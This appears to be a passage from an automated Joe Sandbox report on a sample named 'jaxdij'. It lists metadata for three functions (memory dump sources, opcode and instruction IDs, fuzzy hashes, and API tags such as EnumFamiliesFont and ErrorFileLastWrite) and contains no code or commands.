                                                                                                                          • Instruction ID: 3c12799ec0a4814981dcf76ecc4c5c5f6456ac5b317cfd5b71cf36238cd81a98
                                                                                                                          • Opcode Fuzzy Hash: 561f79f9dfc6028a807b603e8f9aaf7097509357b6f0021318705cb54346aa91
                                                                                                                          • Instruction Fuzzy Hash: 6131E4324A4216EFCF228F55EC0C96A7B66FF08316B18455AFC5409111C332CC79EB85
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00244980 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 92COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: EnumFamiliesFont
                                                                                                                          • String ID: 1$\
                                                                                                                          • API String ID: 2229041460-1239263948
                                                                                                                          • Opcode ID: 05749a8c248f143b30149b7d823d66a057c2da9e47beda654c5944e3772849cd
                                                                                                                          • Instruction ID: 295480414e1d2a63ee2e9d5e727ce2f3744e6c92058b5e9da5aca69188540567
                                                                                                                          • Opcode Fuzzy Hash: 05749a8c248f143b30149b7d823d66a057c2da9e47beda654c5944e3772849cd
                                                                                                                          • Instruction Fuzzy Hash: A9419D74A04208DFDB14DF58C098BAABBF0FF48354F15C0AAE8898B362D775A995CF51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 002474C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                          • String ID: write failed: %lu
                                                                                                                          • API String ID: 442123175-171016427
                                                                                                                          • Opcode ID: ea915a47af31a069eddcb8b9c6039d911e6ad1e270014414793cf94a7a7863d7
                                                                                                                          • Instruction ID: 9d74a581ec5dbe4f3dd19aece85fb14ff4654b35adaafb73e0a5c77ebfd3ea43
                                                                                                                          • Opcode Fuzzy Hash: ea915a47af31a069eddcb8b9c6039d911e6ad1e270014414793cf94a7a7863d7
                                                                                                                          • Instruction Fuzzy Hash: 8C31E6B05083459FCB04DF18D488AAA7BE5EF44354F458A69ECA98B391D370E9A4CB92
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 002475F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                          • String ID: write failed: %lu
                                                                                                                          • API String ID: 442123175-171016427
                                                                                                                          • Opcode ID: e8f5f98ded0ca7af7655fa1fdcfd760ce2241ffe3b6b828af6cbbafa1652dc3b
                                                                                                                          • Instruction ID: 3df18313fff453d4e670fa9fb6fe94e3154d0985ff70328d6dcefd8e8045b086
                                                                                                                          • Opcode Fuzzy Hash: e8f5f98ded0ca7af7655fa1fdcfd760ce2241ffe3b6b828af6cbbafa1652dc3b
                                                                                                                          • Instruction Fuzzy Hash: B01109705083059FC704DF1CD488B9A7BE6EB44364F46CA69E8998B391D3709994CB92
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%